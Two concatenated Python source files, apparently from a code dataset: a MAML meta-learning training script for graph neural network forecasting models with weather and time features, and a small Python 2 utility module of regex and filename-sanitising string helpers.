from torch_geometric.loader import DataLoader
import argparse
import datetime
import logging
import os
import json
from distutils.dir_util import copy_tree
import learn2learn as l2l
import random
from torch.utils.tensorboard import SummaryWriter
DEVICE = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def convert_to_dataloader(data, k_shots=6):
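    """Wrap the processed graph samples in a torch_geometric DataLoader whose
    every draw yields a batch of `k_shots` graphs, used as a support or query
    set during meta-training."""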
data_list = []
for i in range(len(data)):
data_list.append(data[i])
loader = DataLoader(data_list, batch_size=k_shots, shuffle=True)
return loader
def train_model(
train_datasets: dict,
test_datasets: dict,
epochs: int = 200,
adapt_lr: float = 0.001,
batch_task_size: int = -1,
meta_lr: float = 0.001,
adaptation_steps: int = 5,
weather_features: int = 4,
time_features: int = 43,
log_dir: str = None,
dropout: float = 0.2,
hidden_size: int = 32,
node_out_features: int = 10,
gpu: bool = False
):
GAT_model = GATLSTM(
node_in_features=1,
weather_features=weather_features,
time_features=time_features,
node_out_features=10,
gpu=gpu,
hidden_size=hidden_size,
dropout_p=0.3
)
model = Edgeconvmodel(
node_in_features=1,
weather_features=weather_features,
time_features=time_features,
node_out_features=node_out_features,
gpu=gpu,
hidden_size=hidden_size,
dropout_p=dropout
)
model_vanilla = Edgeconvmodel(
node_in_features=1,
weather_features=weather_features,
time_features=time_features,
node_out_features=node_out_features,
gpu=gpu,
hidden_size=hidden_size,
dropout_p=dropout
)
model_vanilla.to(DEVICE)
opt_finetune = optim.RMSprop(model_vanilla.parameters(), 0.001) #arbitrarily set lr
model.to(DEVICE)
GAT_model.to(DEVICE)
maml = l2l.algorithms.MAML(model, lr=adapt_lr, first_order=True)
maml_gat = l2l.algorithms.MAML(GAT_model, lr=adapt_lr, first_order=True)
opt_gat = optim.Adam(maml_gat.parameters(), meta_lr)
opt = optim.Adam(maml.parameters(), meta_lr)
lossfn = torch.nn.MSELoss(reduction='mean')
if batch_task_size == -1 or batch_task_size > len(train_datasets.keys()):
batch_task_size = len(train_datasets.keys())
writer = SummaryWriter(log_dir=log_dir)
step_dict = {f_name: 0 for f_name in train_datasets.keys()}
for epoch in range(epochs):
opt.zero_grad()
opt_gat.zero_grad()
query_loss_vanilla = 0
meta_train_loss = 0.0
meta_train_loss_gat = 0.0
# num_evals = 0
for f_name, task in random.sample(train_datasets.items(), batch_task_size):
learner = maml.clone()
learner_gat = maml_gat.clone()
support_data = next(iter(task)).to(DEVICE)
query_data = next(iter(task)).to(DEVICE)
for _ in range(adaptation_steps): # adaptation_steps
support_preds = learner(support_data)
support_loss = lossfn(support_data.y, support_preds.view(support_data.num_graphs, -1))
learner.adapt(support_loss)
support_preds_gat = learner_gat(support_data)
support_loss_gat = lossfn(support_data.y, support_preds_gat.view(support_data.num_graphs, -1))
learner_gat.adapt(support_loss_gat)
opt_finetune.zero_grad(set_to_none=True)
out = model_vanilla(support_data)
loss = lossfn(support_data.y, out.view(support_data.num_graphs, -1))
loss.backward()
opt_finetune.step()
query_preds = learner(query_data)
query_loss = lossfn(query_data.y, query_preds.view(query_data.num_graphs, -1))
writer.add_scalar(tag=f"{f_name}/query_loss", scalar_value=query_loss.item(), global_step=step_dict[f_name])
step_dict[f_name] += 1
query_preds_gat = learner_gat(query_data)
query_loss_gat = lossfn(query_data.y, query_preds_gat.view(query_data.num_graphs, -1))
writer.add_scalar(tag=f"{f_name}/gat_query_loss", scalar_value=query_loss_gat.item(), global_step=step_dict[f_name])
step_dict[f_name] += 1
with torch.no_grad():
out = model_vanilla(query_data)
loss = lossfn(query_data.y, out.view(query_data.num_graphs, -1))
query_loss_vanilla += loss
meta_train_loss += query_loss
meta_train_loss_gat += query_loss_gat
query_loss_vanilla = query_loss_vanilla / batch_task_size
meta_train_loss = meta_train_loss / batch_task_size
meta_train_loss_gat = meta_train_loss_gat / batch_task_size
if epoch % 1 == 0:
logger.info(f"Epoch: {epoch+1}")
logger.info(f"Meta Train Loss: {meta_train_loss.item()}")
logger.info(f"(gat) Meta Train Loss: {meta_train_loss_gat.item()}")
logger.info(8 * "#")
writer.add_scalar(tag=f"Meta/loss", scalar_value=meta_train_loss.item(), global_step=epoch)
writer.add_scalar(tag=f"Meta/gat_loss", scalar_value=meta_train_loss_gat.item(), global_step=epoch)
#writer.add_scalar(tag=f"vanilla/loss", scalar_value=query_loss_vanilla.item(), global_step=epoch)
meta_train_loss.backward()
meta_train_loss_gat.backward()
torch.nn.utils.clip_grad_norm_(maml.parameters(), 1)
torch.nn.utils.clip_grad_norm_(maml_gat.parameters(), 1)
opt.step()
opt_gat.step()
return model, model_vanilla, GAT_model
if __name__ == "__main__":
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
parser = argparse.ArgumentParser(description="Model training argument parser")
parser.add_argument("-d", "--data_dir", type=str, help="Directory of datasets")
parser.add_argument("-t", "--train_size", type=float, default=0.8, help="Ratio of data to be used for training")
parser.add_argument("-b", "--batch_task_size", type=int, default=-1, help="number of tasks to sample")
parser.add_argument("-k", "--k_shot", type=int, default=5, help="shots to be used")
parser.add_argument("-a", "--adaptation_steps", type=int, default=5, help="Number of adaptation steps")
parser.add_argument("-e", "--epochs", type=int, default=200, help="number of epochs")
parser.add_argument("-alr", "--adapt_lr", type=float, default=0.001, help="Adaptation learning rate")
parser.add_argument("-mlr", "--meta_lr", type=float, default=0.001, help="Meta learning rate")
parser.add_argument("-ld", "--log_dir", type=str, default=None, help="directory to log stuff")
parser.add_argument("-ex", "--exclude", type=str, default="", help="comma seperated list of datasets to exclude")
parser.add_argument("-hs", "--hidden_size", type=int, default=32)
parser.add_argument("-dp", "--dropout_p", type=float, default=0.2)
parser.add_argument("-no", "--node_out_features", type=int, default=10)
parser.add_argument("-g", "--gpu", action='store_true')
args = parser.parse_args()
train_dataloader_dict = {}
test_dataloader_dict = {}
exclude_list = args.exclude.split(",")
for f in os.listdir(args.data_dir):
abs_path = os.path.join(args.data_dir, f)
CONTINUE_FLAG=False
for exclude_file in exclude_list:
if f.startswith(exclude_file) and len(exclude_file) > 0:
CONTINUE_FLAG = True
if CONTINUE_FLAG:
continue
with open(abs_path, "rb") as infile:
logger.info(abs_path)
data = dill.load(infile)
train_data, test_data = Dataset.train_test_split(data, num_history=12, shuffle=True, ratio=args.train_size)
train_data_dataloader = convert_to_dataloader(train_data, k_shots=args.k_shot)
test_data_dataloader = convert_to_dataloader(test_data, k_shots=args.k_shot)
f_name = f.split("/")[-1].replace(".pkl", "")
train_dataloader_dict[f_name] = train_data_dataloader
test_dataloader_dict[f_name] = test_data_dataloader
logger.info(str(train_dataloader_dict))
WEATHER_FEATURES = train_data.weather_information.shape[-1]
TIME_FEATURES = train_data.time_encoding.shape[-1]
start_time = datetime.datetime.now()
logger.info(f"Fitting model at time: {str(start_time)}")
if args.log_dir is not None:
log_dir = f"{args.log_dir}/{start_time.isoformat()}"
else:
log_dir = None
model, vanilla_model, gat_model = train_model(
train_datasets=train_dataloader_dict,
test_datasets=test_dataloader_dict,
adaptation_steps=args.adaptation_steps,
batch_task_size=args.batch_task_size,
epochs=args.epochs,
adapt_lr=args.adapt_lr,
meta_lr=args.meta_lr,
weather_features=WEATHER_FEATURES,
time_features=TIME_FEATURES,
hidden_size=args.hidden_size,
dropout=args.dropout_p,
node_out_features=args.node_out_features,
log_dir=log_dir,
gpu=args.gpu
)
model.to("cpu")
torch.save(model.state_dict(), f"{log_dir}/model.pth")
vanilla_model.to("cpu")
torch.save(vanilla_model.state_dict(), f"{log_dir}/vanilla_model.pth")
gat_model.to("cpu")
torch.save(gat_model.state_dict(), f"{log_dir}/gat_model.pth")
args_dict = vars(args)
with open(f"{log_dir}/settings.json", "w") as outfile:
json.dump(args_dict, outfile)
"""end_time = datetime.datetime.now()
end_time_str = end_time.strftime("%Y-%m-%d %H:%M:%S")
td = end_time - start_time
minutes = round(td.total_seconds() / 60, 2)
totsec = td.total_seconds()
h = int(totsec // 3600)
m = int((totsec % 3600) // 60)
sec = int((totsec % 3600) % 60)
logger.info(f"Total training time: {h}:{m}:{sec}")
logger.info(f"Average Epoch time: {round(minutes/args.epochs, 2)} minutes")
cur_dir = os.getcwd()
while True:
split_dir = cur_dir.split("/")
if "Thesis" not in split_dir:
break
else:
if split_dir[-1] == "Thesis":
break
else:
os.chdir("..")
cur_dir = os.getcwd()
os.chdir("models")
cur_dir = os.getcwd()
logger.info(f"Saving files to {cur_dir}/{args.model}_{end_time_str}")
os.mkdir(f"{args.model}_{end_time_str}")
args_dict = vars(args)
with open(f"{args.model}_{end_time_str}/settings.json", "w") as outfile:
json.dump(args_dict, outfile)
losses_dict = {"train_loss": train_loss, "test_loss": test_loss}
outfile = open(f"{args.model}_{end_time_str}/losses.pkl", "wb")
dill.dump(losses_dict, outfile)
outfile.close()
model.to("cpu")
torch.save(model.state_dict(), f"{args.model}_{end_time_str}/model.pth")
logger.info("Files saved successfully")
os.chdir(f"{args.model}_{end_time_str}")
os.mkdir(f"logs")
target_dir = "logs"
source_dir = f"{os.getenv('HOME')}/.lsbatch"
copy_tree(source_dir, target_dir)
for f in os.listdir(target_dir):
if not f.endswith("err") and not f.endswith("out"):
os.remove(f"{target_dir}/{f}")"""
| 2.34375 | 2 |
cirosantilli/utils.py | cirosantilli/python-utils | 1 | 12789350 | #!/usr/bin/env python
import re
import os.path
STDERR_SEPARATOR0 = '=' * 60
def iterify(iterable):
if isinstance(iterable, basestring):
iterable = [iterable]
try:
iter(iterable)
except TypeError:
iterable = [iterable]
return iterable
def resub(resubpair,target):
"""takes a regex find replace pair (find, replace) and applies it to a target
:param resubpair: find re and substitute string
:type resubpair: a pair: (re.compile object, string)
:param target: what to operate on
    :type target: string
"""
return resubpair[0].sub(resubpair[1],target)
def resubs(resubpairs,target):
"""takes several regex find replace pairs [(find1, replace1), (find2,replace2), ... ]
    and applies them to a target in the order given"""
for resubpair in resubpairs:
target = resub(resubpair,target)
return target
whitespaces_to_single_space_resub = [re.compile(r"\s+")," "]
def whitespaces_to_single_space(s):
return resub(whitespaces_to_single_space_resub,s)
remove_heading_whitespace_resub = [re.compile(r"^\s+"),""]
def remove_heading_whitespace(s):
    return resub(remove_heading_whitespace_resub,s)
remove_trailling_whitespace_resub = [re.compile(r"\s+$"),""]
def remove_trailling_whitespace(s):
return resub(remove_trailling_whitespace_resub,s)
CONTROL_CHARS_STR = u''.join(map(unichr, range(0,32) + range(127,160)))
CONTROL_CHAR_RE = re.compile('[%s]' % re.escape(CONTROL_CHARS_STR), re.UNICODE)
def strip_control_chars(s):
return CONTROL_CHAR_RE.sub(ur"", s)
if __name__ == '__main__':
print 'TEST'
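    # Illustrative sample input exercising the helpers above.
    sample = u"  hello\t\tworld  "
    print whitespaces_to_single_space(sample)
    print remove_trailling_whitespace(sample)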
#FORBIDDEN_PRINTABLE_BASENAME_CHARS_STR = '|\\?*<":>+[]/'
MAX_BNAME_LENGTH = 255
FORBIDDEN_PRINTABLE_BASENAME_CHARS_STR = ur"/:\\|*<>\""
FORBIDDEN_BASENAME_CHARS = CONTROL_CHARS_STR + FORBIDDEN_PRINTABLE_BASENAME_CHARS_STR
FORBIDDEN_BASENAME_CHARS_RE = re.compile(ur"[%s]" % re.escape(FORBIDDEN_BASENAME_CHARS), re.UNICODE)
| 3 | 3 |